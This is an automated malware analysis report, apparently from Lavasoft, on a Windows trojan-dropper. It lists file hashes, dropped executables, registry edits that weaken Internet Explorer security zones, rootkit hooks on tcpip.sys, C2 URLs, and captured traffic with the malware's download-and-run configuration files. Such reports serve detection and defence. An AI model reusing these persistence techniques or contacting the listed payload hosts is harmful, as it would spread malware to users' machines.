Gen.Variant.Graftor.104958_1029a36935

by malwarelabrobot on April 7th, 2015 in Malware Descriptions.

Trojan-Dropper.Win32.Flystud.d (Kaspersky), Gen:Variant.Graftor.104958 (B) (Emsisoft), Gen:Variant.Graftor.104958 (AdAware), mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan


This description has been generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: 1029a3693577a20f33abe5e8b6dae06f
SHA1: f136cccde3e38a4629a5487bb9489be5189fb22d
SHA256: 2e35362b419de4f52e1ee9ff9f863810e62ec540ea7026adc55e046c2cebbc38
SSDeep: 49152:Av4hcI6DRlQRAt8Rxhwp3ijLsTQpsvD/DX y4onCYDoD5:2I79wp4yOsvD/D donCYUV
Size: 2070410 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: TODO:
Created at: 2000-05-19 13:11:55
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Dropper: a Trojan program intended for the stealthy installation of other malware on the user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1612
bv.exe:464
7048ico.exe:1096
comdhost.exe:424

The Trojan injects its code into the following process(es):

300084.exe:256

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\E_4\krnln.fnr (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\smss.exe (6435 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bv.exe (1784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\E_4\shell.fne (57 bytes)

The process bv.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\byteFirewall.dat (253 bytes)

The process 7048ico.exe:1096 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\2015040604\userconfig.ini (22 bytes)
%WinDir%\2015040604\config.ini (22 bytes)
%WinDir%\2015040604\svchost.exe (2105 bytes)
%System%\filelog.dat (24 bytes)

The process comdhost.exe:424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\fsq.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mssrv.exe (38495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\config[1].xml (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\nclound32.zip (78548 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\config.ini (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\common[1].zip (196738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\plusconfig.xml (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjt_qt.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\brocount.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\kjqt[1].zip (5979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\svchost.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\kjqt.zip (3945 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mp.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appboot.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lockmp.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\FC[1].zip (7311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\TT2[1].zip (34919 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\MainCtrl[1].xml (2457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\FC.zip (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\FC.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\nclound32[1].zip (124172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\TT2.zip (17429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\mainpage32[1].zip (14971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\AplusFile.bt (1136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjtqt.exe (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lsass.exe (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\mainpage32.zip (5733 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\common.zip (130989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\ProjPack.xml (1701 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appeight.exe (56684 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\ProjPack.xml (0 bytes)

Registry activity

The process %original file name%.exe:1612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 0E B0 DC C8 12 71 5E 22 5F DE A4 C4 DB 6E 18"

The process bv.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 7A E7 B2 35 A7 1B F5 B9 E2 38 71 F4 CE 77 8E"

The process 7048ico.exe:1096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 FC 3D 27 FF 85 4F 32 EA 27 29 91 3B 95 74 79"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\windows\2015040604]
"svchost.exe" = "2015"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security-zone settings to map all local web nodes without dots that do not belong to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process comdhost.exe:424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 34 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 CF 63 BA 05 25 F3 2A A9 71 B2 1B 40 3E 92 F7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security-zone settings to map all local web nodes without dots that do not belong to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
97c8fe752e354b2945e4c593a87e4a8b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\E_4\krnln.fnr
d63851f89c7ad4615565ca300e8b8e27 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\E_4\shell.fne
11696f334778bda9231aa6b72bbcdaf7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\E_N4\krnln.fnr
bfa0b913e4067706b8f2746d51caac44 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bv.exe
3ed32c6b3a6794a7ee6223aef4670b5d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\smss.exe
cf0611524894bb6d0a64a8e157846efd c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\comdhost.exe
4de3914c7921c9d382d5d73ffc5f55cb c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\msvcr32.dll
1ddf4cc1188804e8670e9ca6139c2fed c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\szicoad[1].exe
103909a23b5ac9774471b315d373fc06 c:\WINDOWS\2015040604\TCP-2015040604.dll
1ddf4cc1188804e8670e9ca6139c2fed c:\WINDOWS\2015040604\svchost.exe
14e87fff8fa466a7b829c65cc12fb35f c:\WINDOWS\system\7048ico.exe
33579f370aeb1237a9282b51eacb6d34 c:\WINDOWS\system\svchost.exe
fa682e642f66964cfddaa86b938d6694 c:\byteFirewall.dat

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\C:\byteFirewall.dat", the Trojan replaces the IRP handlers of the devices belonging to the tcpip.sys driver, hooking the following major function codes:

MJ_CREATE
MJ_CREATE_NAMED_PIPE
MJ_CLOSE
MJ_READ
MJ_WRITE
MJ_QUERY_INFORMATION
MJ_SET_INFORMATION
MJ_QUERY_EA
MJ_SET_EA
MJ_FLUSH_BUFFERS
MJ_QUERY_VOLUME_INFORMATION
MJ_SET_VOLUME_INFORMATION
MJ_DIRECTORY_CONTROL
MJ_FILE_SYSTEM_CONTROL
MJ_DEVICE_CONTROL
MJ_INTERNAL_DEVICE_CONTROL
MJ_SHUTDOWN
MJ_LOCK_CONTROL
MJ_CLEANUP
MJ_CREATE_MAILSLOT
MJ_QUERY_SECURITY
MJ_SET_SECURITY
MJ_POWER
MJ_SYSTEM_CONTROL
MJ_DEVICE_CHANGE
MJ_QUERY_QUOTA
MJ_SET_QUOTA

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 19868 20480 4.51528 15c1f09b5a84212473d3312136f61984
.rdata 24576 2634 4096 2.46987 c3a429c9401d144a06bbf6c66f26e739
.data 28672 8024 8192 1.98312 391dfe9979de8fe0fe40df3f14303242
.ecode 36864 4096 4096 3.11561 dd0555631ceaf30c86b63ebb73afd81f
.rsrc 40960 928 4096 1.08643 654c64e0942f056dece224a875c0f5c8

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://ipaddress.wb916.com/IP.aspx 180.97.81.86
hxxp://a767.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://a767.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://oss-cn-beijing-sandbox-2.ossuser.aliyuncs.com/server/server.txt
hxxp://cdct.zhdns.net/proj/BackEnd.ini
hxxp://cdct.zhdns.net/m137390001.xml
hxxp://ddkj04.oss-cn-hangzhou.aliyuncs.com/updata/adclient/client/szicoad.exe
hxxp://cdct.zhdns.net/proj/BackEnd32.zip
hxxp://cdct.zhdns.net/config.xml
hxxp://cdct.zhdns.net/proj/MainCtrl.xml
hxxp://pubyun.s.3322.net/dyndns/getip
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt 87.245.221.113
hxxp://domain.awangba.com.cn/proj/MainCtrl.xml 58.218.211.249
hxxp://domain.awangba.com.cn/proj/BackEnd.ini 58.218.211.249
hxxp://down04.kuaibu8.com/updata/adclient/client/szicoad.exe 112.124.219.90
hxxp://www.3322.org/dyndns/getip 118.184.176.15
hxxp://down.awangba.com.cn/proj/BackEnd32.zip 122.226.181.115
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab 87.245.221.113
hxxp://user.awangba.com.cn/m137390001.xml 122.226.102.76
hxxp://domain.awangba.com.cn/config.xml 58.218.211.249
hxxp://gengxin.kuaibu8.com/server/server.txt 182.92.18.11
tongji.wangbax.cn 115.28.38.37
www.kuaibu8.com 180.97.81.86


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET DNS DNS Query for Suspicious .com.cn Domain
ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=10437
Date: Mon, 06 Apr 2015 01:53:24 GMT
Connection: keep-alive
X-CCC: ES
X-CID: 2
1401D04D49E16F8687....



GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1

Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Feb 2015 00:36:45 GMT
Accept-Ranges: bytes
ETag: "804c50f7c94fd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 49859
Cache-Control: max-age=10786
Date: Mon, 06 Apr 2015 01:53:24 GMT
Connection: keep-alive
X-CCC: ES
X-CID: 2

<<< skipped >>>

GET /config.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: domain.awangba.com.cn
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 617
Last-Modified: Wed, 21 Jan 2015 07:59:49 GMT
Accept-Ranges: bytes
Server: nginx
Date: Sun, 05 Apr 2015 08:32:08 GMT
ETag: "54bf5c75-269"
Age: 62667
X-Cache: HIT from ctjsxzs1
Via: 1.0 ctjsxzs1 (squid)
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>
<Config>
    <UpUrl>
        <MainPageID></MainPageID>
        <ycgg>*.059jxw.com@*.777tttkkk.com@*.changduanxue.com@*.jia665511.com@*.okok77889.com</ycgg>
    </UpUrl>
    <BlackUrl>about:Tabs@about:blank@file:*@*.shunwang.com*@*.google.com*@*.baidu.com*@*.gov.cn@*.58qh.com@111.113.6.21@*.yxeram.org@*.yxera.org@*.yxera.net@[email protected].*@*gonggao.icafe8.net*@*xd.xoyo.com*</BlackUrl>
    <OutGameUrl>hXXp://tz.awangba.com.cn/uimg1.htm@hXXp://VVV.baidu.com@hXXp://VVV.sina.com@hXXp://VVV.163.com</OutGameUrl>
    <TestUser>*</TestUser>
    <MainPageWhite></MainPageWhite>
</Config>

<<< skipped >>>

GET /proj/MainCtrl.xml HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: domain.awangba.com.cn
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 4337
Last-Modified: Fri, 03 Apr 2015 03:12:39 GMT
Accept-Ranges: bytes
Server: nginx
Date: Sun, 05 Apr 2015 05:05:29 GMT
ETag: "551e0527-10f1"
Age: 75067
X-Cache: HIT from ctjsxzs1
Via: 1.0 ctjsxzs1 (squid)
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>
<FileDown>
    <item name="common" type="Common">
        <sys type="all">
            <file>common.zip</file>
            <down>hXXp://down.awangba.com.cn/proj/common.zip</down>
            <md5>116C3295FF8726952963A5774637B309</md5>
            <param>appboot.exe</param>
        </sys>
    </item>

    <item name="new" type="SGTS">
        <sys type="x86">
            <file>sgts.zip</file>
            <down>hXXp://down.awangba.com.cn/proj/sgts.zip</down>
            <md5>FC538737F7D79ACB274CE860194614A3</md5>
            <param>sgts.exe</param>
        </sys>
    </item>
    <item name="gda" type="GDA">
        <sys type="x86">
            <file>PtsGPU32.zip</file>
            <down>hXXp://down.awangba.com.cn/proj/PtsGPU32.zip</down>
            <md5>6556006F549C0AE154AE60694D5242E2</md5>
            <param>PtsGPU.exe</param>
        </sys>
        <sys type="x64">
            <file>PtsGPU64.zip</file>
            <down>hXXp://down.awangba.com.cn/proj/PtsGPU64.zip</down>
            <md5>AA9328656593D9D174CC5BDF07687807</md5>
            <param>PtsGPU.exe</param>
        </sys>
    </item>
    <item name="neda,eda,ChannelEda" type="EDA">
        <sys type="x86">
            <file>nclound32.zip</file>
            <down>hXXp://down.awangba.com.cn/proj/nclound32.zip</down>
            <md5>41FE0E8A5A889DB45241081868D75407</md5>
            <param

<<< skipped >>>

GET /m137390001.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: user.awangba.com.cn
Connection: Keep-Alive


HTTP/1.0 200 OK
Server: nginx
Date: Fri, 27 Mar 2015 20:46:54 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 462
Last-Modified: Fri, 27 Mar 2015 09:41:55 GMT
ETag: "551525e3-1ce"
Accept-Ranges: bytes
Age: 70720
X-Cache: HIT from ctzjjhs1
Via: 1.0 ctzjjhs1 (squid)
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>
<UserInfo autoPlayTime="20141130">
    <item type="10511">
        <MainPageID>sg7844</MainPageID>
        <OutGameID/>
        <OutGame2ID>100412</OutGame2ID>
        <OutGame3ID/>
        <SGTPID/>
        <eda>108611</eda>
        <gda/>
        <BlackUrl/>
        <f>0</f>
        <s>0</s>
        <q>1</q>
        <c>1</c>
        <d>1</d>
        <area>dt_one</area>
        <ycgg>100412</ycgg>
        <cq>1</cq>
        <kjqt>300084</kjqt>
        <dbt>100412</dbt>
    </item>
</UserInfo>

<<< skipped >>>

GET /IP.aspx HTTP/1.1
User-Agent: AutoIt
Host: ipaddress.wb916.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49
[......]........=37.57.16.189........=...........


GET /updata/adclient/client/szicoad.exe HTTP/1.1
Range: bytes=0-
Unless-Modified-Since: Fri, 27 Mar 2015 18:31:32 GMT
If-Range: "1DDF4CC1188804E8670E9CA6139C2FED"
User-Agent: AutoIt
Host: down04.kuaibu8.com


HTTP/1.1 206 Partial Content
Date: Mon, 06 Apr 2015 01:53:35 GMT
Content-Type: application/x-msdownload
Content-Length: 389558
Connection: close
Accept-Ranges: bytes
Content-Range: bytes 0-389557/389558
ETag: "1DDF4CC1188804E8670E9CA6139C2FED"
Last-Modified: Fri, 27 Mar 2015 18:31:32 GMT
Server: AliyunOSS
x-oss-request-id: 5521E71F957EEBB6599ED681


GET /proj/BackEnd.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: domain.awangba.com.cn
Connection: Keep-Alive


HTTP/1.0 200 OK
Server: nginx
Date: Sun, 05 Apr 2015 05:40:09 GMT
Content-Type: application/octet-stream
Content-Length: 477
Last-Modified: Wed, 25 Mar 2015 02:18:43 GMT
ETag: "55121b03-1dd"
Accept-Ranges: bytes
Age: 72797
X-Cache: HIT from ctzjjhs1
Via: 1.0 ctzjjhs1 (squid)
Connection: keep-alive
[config]
run=yes
cudp=19034
sudp=19033
stcp1=19042
stcp2=19048
bguid=F3450EDC-EAF6-BCE5-BEC8-25CF003FE045
path=%temp%\downt
seed=AplusFile.bt
extparam=com
[x86]
name=BackEnd32.zip
url=hXXp://down.awangba.com.cn/proj/BackEnd32.zip
md5=2E2642D3D4568793E2699EAE74370D2E
path=%temp%\downt
param=comdhost.exe
[x64]
name=BackEnd64.zip
url=hXXp://down.awangba.com.cn/proj/BackEnd64.zip
md5=C6B9ABFB262D1DD8DD75243165020C08
path=%temp%\downt
param=comdhost.exe

<<< skipped >>>

GET /dyndns/getip HTTP/1.1
User-Agent: APlus
Host: VVV.3322.org


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Apr 2015 01:53:50 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Content-Type: text/plain; charset=utf-8
d
37.57.16.189
0


GET /proj/BackEnd32.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.awangba.com.cn
Connection: Keep-Alive


HTTP/1.0 200 OK
Server: nginx
Date: Wed, 25 Mar 2015 02:30:13 GMT
Content-Type: application/zip
Content-Length: 171307
Last-Modified: Wed, 25 Mar 2015 02:16:54 GMT
ETag: "55121a96-29d2b"
Accept-Ranges: bytes
Age: 3001
X-Cache: HIT from ctzjtzs1
Via: 1.0 ctzjtzs1 (squid)
Connection: keep-alive

<<< skipped >>>

GET /server/server.txt HTTP/1.1
User-Agent: AutoIt
Host: gengxin.kuaibu8.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:44 GMT
Content-Type: text/plain
Content-Length: 861
Connection: close
Accept-Ranges: bytes
ETag: "5F518A33E3525F232868CB7B8D966762"
Last-Modified: Wed, 01 Apr 2015 16:00:47 GMT
Server: AliyunOSS
x-oss-request-id: 5521E728B7EB447F466C7227
[File]
kuaibu8=hXXp://VVV.kuaibu8.com/iniuser/
uc916=hXXp://VVV.uc916.com/iniuser/
szicoad=hXXp://VVV.kuaibu8.com:8089/ico/
minyang=hXXp://mingyangdown.oss-cn-qingdao.aliyuncs.com/userini/
[update]
Startupdate=yes
kuaibu8=kuaibu8
szicoad=szicoad
minyang=minyang
uc916=uc916
[server]
01=down04.kuaibu8.com
02=down04.kuaibu8.com
03=down04.kuaibu8.com
04=down04.kuaibu8.com
05=down04.kuaibu8.com
06=down04.kuaibu8.com
07=down04.kuaibu8.com
08=down04.kuaibu8.com
09=down04.kuaibu8.com
10=down04.kuaibu8.com
[dllhost]
yewu01=/updata/adclient/ie/ieadd.dll
yewu02=/updata/adclient/cpu/cpu.dll
yewu03=/updata/adclient/sohu/sohuvip.dll
yewu04=/updata/adclient/kbts/kbts.dll
yewu05=/updata/adclient/pcfen/pcfen.dll
yewu06=/updata/adclient/desk/desk1.exe
yewu07=/updata/adclient/iejs/iejs.dll
yewu99=/updata/adclient/yileyou/yileyou.dll


GET /updata/adclient/client/szicoad.exe HTTP/1.1
User-Agent: AutoIt
Host: down04.kuaibu8.com


HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:33 GMT
Content-Type: application/x-msdownload
Content-Length: 389558
Connection: close
Accept-Ranges: bytes
ETag: "1DDF4CC1188804E8670E9CA6139C2FED"
Last-Modified: Fri, 27 Mar 2015 18:31:32 GMT
Server: AliyunOSS
x-oss-request-id: 5521E71D51235893A88ED225

<<< skipped >>>

GET /IP.aspx HTTP/1.1
User-Agent: AutoIt
Host: ipaddress.wb916.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49
[......]........=37.57.16.189........=...........


GET /server/server.txt HTTP/1.1
User-Agent: AutoIt
Host: gengxin.kuaibu8.com
Cache-Control: no-cache


HTTP/1.1 200 OK
